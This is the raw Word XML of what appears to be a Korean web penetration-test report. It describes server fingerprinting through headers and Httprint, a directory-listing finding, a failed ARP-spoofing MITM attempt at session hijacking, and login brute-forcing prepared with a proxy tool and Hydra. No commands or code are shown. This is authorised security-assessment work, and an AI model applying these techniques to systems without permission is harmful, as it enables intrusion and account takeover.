            <wp:docPr id="132" name="그림 132" descr="https://lh5.googleusercontent.com/lcuUwDfwLswBLdj1nQ668Zc8zP7sCaLQbLqhiI897H1l7CJPWM4jsIgXLzwVXX12MVBaaZJ2BvvzqgSGtzP9P-lC_NseU5bi40Eqy_8sctAmlVKBm_ndD1g2hCDwrWVJ3V6h2e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h5.googleusercontent.com/lcuUwDfwLswBLdj1nQ668Zc8zP7sCaLQbLqhiI897H1l7CJPWM4jsIgXLzwVXX12MVBaaZJ2BvvzqgSGtzP9P-lC_NseU5bi40Eqy_8sctAmlVKBm_ndD1g2hCDwrWVJ3V6h2eWX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4" cy="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76E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034540" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="133" name="그림 133" descr="https://lh6.googleusercontent.com/gjXX0jDwN5lCbvc8gFZPHw_ag7PSUBXJ6KoRmxQTuWJtxv1a7G_ZJKIhG815ogopXGPm7Rvc6dUpO-QLnq0bJlZpV9kPVF7mhjDvjhXIa6p06xebSj6ryBHW_68Chtjodx4rcY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lh6.googleusercontent.com/gjXX0jDwN5lCbvc8gFZPHw_ag7PSUBXJ6KoRmxQTuWJtxv1a7G_ZJKIhG815ogopXGPm7Rvc6dUpO-QLnq0bJlZpV9kPVF7mhjDvjhXIa6p06xebSj6ryBHW_68Chtjodx4rcYR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6E" w:rsidRDefault="0010076E" w:rsidP="004A79E9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1996440" cy="296768"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="135" name="그림 135" descr="https://lh3.googleusercontent.com/P2Mu6efB5jpKDUhRCUK_W4Q5xOGXuDpEiYPuTZ9H27ziXoRt3oBw3f9RZw6LkAfPtJNcWG82RuRmMGAJe5hUxsdwjzroBqaAr88v0i_IQvgiVs5iDfjGAuEWi49UVUP1mpOL4X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3.googleusercontent.com/P2Mu6efB5jpKDUhRCUK_W4Q5xOGXuDpEiYPuTZ9H27ziXoRt3oBw3f9RZw6LkAfPtJNcWG82RuRmMGAJe5hUxsdwjzroBqaAr88v0i_IQvgiVs5iDfjGAuEWi49UVUP1mpOL4Xl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00" cy="3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-1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2423160" cy="218426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18892"/>
                <wp:lineTo x="21396" y="18892"/>
                <wp:lineTo x="21396" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="134" name="그림 134" descr="https://lh6.googleusercontent.com/KE8HfPOCUoDJ74MVobKJp5AN_RHBRbTOfA1PtZqJ6AQLekh2b2D3dMKTlCbjQBaI9aNijEgXgm-4BrUEsVrmIWl2ex2dR8nVfygCensh1UVwSwFPGiIq3_VWQA984XwDIXIVYK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lh6.googleusercontent.com/KE8HfPOCUoDJ74MVobKJp5AN_RHBRbTOfA1PtZqJ6AQLekh2b2D3dMKTlCbjQBaI9aNijEgXgm-4BrUEsVrmIWl2ex2dR8nVfygCensh1UVwSwFPGiIq3_VWQA984XwDIXIVYKT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9E9" w:rsidRPr="0010076E" w:rsidRDefault="004A79E9" w:rsidP="0010076E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRPr="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9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4A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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651760" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="그림 22" descr="https://lh6.googleusercontent.com/wOqGca4bdJ-RdFEBE_WAB5p3PRze8Cgl-bWQoUoVD9uypifef9IXRee9Mb26rWo_NYT0WrLaMj5IROusvK0gedRo782IwUIQJbcNRYgQwSILqNH_yBn0sfqswZYdy2JoOxEGyx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wOqGca4bdJ-RdFEBE_WAB5p3PRze8Cgl-bWQoUoVD9uypifef9IXRee9Mb26rWo_NYT0WrLaMj5IROusvK0gedRo782IwUIQJbcNRYgQwSILqNH_yBn0sfqswZYdy2JoOxEGyxs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Pr="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">현재 컨설팅 대상의 웹 페이지에 접속 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 확인하면 헤더를 통해 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 버전,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>종류,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전 정보를 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:ind w:left="804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3497580" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="23" name="그림 23" descr="https://lh4.googleusercontent.com/kH4uSnSo00mqFJfpTn_IweA8fcE_1HxTg6dNV7D_qDYigsr8Ji_5RXqmvlBUJjoDo-niW7xkWzUKgQFlvRt3XL7e1Bxf2cJc6v8iv7fXk9LuWYu57v6RCfmqh7KCXBICd2U8_q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kH4uSnSo00mqFJfpTn_IweA8fcE_1HxTg6dNV7D_qDYigsr8Ji_5RXqmvlBUJjoDo-niW7xkWzUKgQFlvRt3XL7e1Bxf2cJc6v8iv7fXk9LuWYu57v6RCfmqh7KCXBICd2U8_qL-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Default="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:ind w:left="804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3497580" cy="274320"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="24" name="그림 24" descr="https://lh3.googleusercontent.com/SMrvEWqEBxNjyJjvz_4HfiOFwRN8Bi15NsvWssVkiEV4Gvr3RxV5VTEllkYlAAO1Nk_z65WO_U2Cd154tI6BNR-c2bvVGtoVsne4351AGleRjmyYj4CtiuhHr1zJrg9Rj84B22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SMrvEWqEBxNjyJjvz_4HfiOFwRN8Bi15NsvWssVkiEV4Gvr3RxV5VTEllkYlAAO1Nk_z65WO_U2Cd154tI6BNR-c2bvVGtoVsne4351AGleRjmyYj4CtiuhHr1zJrg9Rj84B22a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Default="004A79E9" w:rsidP="004A79E9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rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ttpint </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">툴을 이용하면 서버의 정보를 알아올 수 있는데 컨설팅 대상의 메인 페이지로 접속 시 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>되는 것과 서버,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 정보가 노출되는 것을 볼 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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3505200" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="그림 25" descr="https://lh6.googleusercontent.com/o1RB9CkgdVyMDFMaM--NFbmdlJaZ1Pfo91Yh3LAprRBY9zA8u4Up_xUrs46u_22nzuWgpo3fyPm4DavB6iysvQZTr0rlVwv2JDvmEtL_IkqBXkD7_pIwG_IL1g5fbOBD4W4RJO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6.googleusercontent.com/o1RB9CkgdVyMDFMaM--NFbmdlJaZ1Pfo91Yh3LAprRBY9zA8u4Up_xUrs46u_22nzuWgpo3fyPm4DavB6iysvQZTr0rlVwv2JDvmEtL_IkqBXkD7_pIwG_IL1g5fbOBD4W4RJONH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Default="004A79E9" w:rsidP="004A79E9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컨설팅 대상의 웹 페이지 접속 후 기본 페이지에서 가지고 있지 않을 만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을 불러오면 웹 페이지에 오류 메시지가 출력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오류 메시지를 확인해보면 서버와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 정보를 확인할 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="00C73585" w:rsidRDefault="004A79E9" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9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4A79E9">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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876800" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="그림 26" descr="https://lh4.googleusercontent.com/OX4q1fdYc_-ZjaXzQv9kSKGe_SKn12JgWxx_NM0hiEPUFsq8m9Q5bJAcnHklUYLRafMsCZiUofRfw2EG_5kx1S-wo3kTsBqIjHkEyyJYVnGqS99WCsFRe8y8du0WqhJYOfHltE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OX4q1fdYc_-ZjaXzQv9kSKGe_SKn12JgWxx_NM0hiEPUFsq8m9Q5bJAcnHklUYLRafMsCZiUofRfw2EG_5kx1S-wo3kTsBqIjHkEyyJYVnGqS99WCsFRe8y8du0WqhJYOfHltET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Pr="00C73585" w:rsidRDefault="004A79E9" w:rsidP="00C7358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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>현재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메인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페이지가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위치한</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Main </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory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상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szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> home</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로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접속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해보면</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory Listing </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이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실행되는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것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확인</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,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이를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통해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기타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다른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Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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구조를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파악할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수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  <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있음</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="004A79E9" w:rsidRDefault="004A79E9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4A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sniffing </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>통한</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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419600" cy="1516380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="27" name="그림 27" descr="https://lh3.googleusercontent.com/8bMeRgwTpA0zvSOhQa1zAoCpLgCHSjUwKWbn4GKZWcIyY84g4aqghdgd-TEUiYSRjd0W9hFkD6F9KZCLQd5sBKn3YUihNLvN5NbPsBKpsLtafvsOERA6sRZhDlCcYfbSQee9T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8bMeRgwTpA0zvSOhQa1zAoCpLgCHSjUwKWbn4GKZWcIyY84g4aqghdgd-TEUiYSRjd0W9hFkD6F9KZCLQd5sBKn3YUihNLvN5NbPsBKpsLtafvsOERA6sRZhDlCcYfbSQee9T9E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9" w:rsidRPr="00C73585" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용한</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격으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Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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성공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Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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확인할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수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있었지만</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용한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암호화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통신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하고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있었기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때문에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Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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내용에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포함되어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있을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세션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정보를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알아내지</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>못함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRPr="00C73585" w:rsidRDefault="00C73585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C73585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P / Password Brute Forcing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585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610100" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="그림 28" descr="https://lh3.googleusercontent.com/3yLbkFUbqEt1Y_fCZQC2Kac6NS0oSNNQwnUi5HXB-yB14W-36tRT9QVSyqmlHvpyktgijBkc4uLhJXPQvuzyamli_igw0AzHqOtxcBWfP3fN4M_fk6_d2xj_oZuVgEmD0OFlaJ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3yLbkFUbqEt1Y_fCZQC2Kac6NS0oSNNQwnUi5HXB-yB14W-36tRT9QVSyqmlHvpyktgijBkc4uLhJXPQvuzyamli_igw0AzHqOtxcBWfP3fN4M_fk6_d2xj_oZuVgEmD0OFlaJH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85" w:rsidRPr="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C7358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73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>모의해킹에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필요한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정상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로그인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정보를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확인하기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위해서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정상적인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방법으로</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이고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비밀번호가</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인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계정을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생성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,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후에</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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이용해</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">roxy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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설정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상태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정상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로그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시와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로그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실패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응답</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">acket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>내용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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRPr="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C7358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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로그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실패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시에만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확인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있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문자열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찾아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Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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공격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때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사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585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602480" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
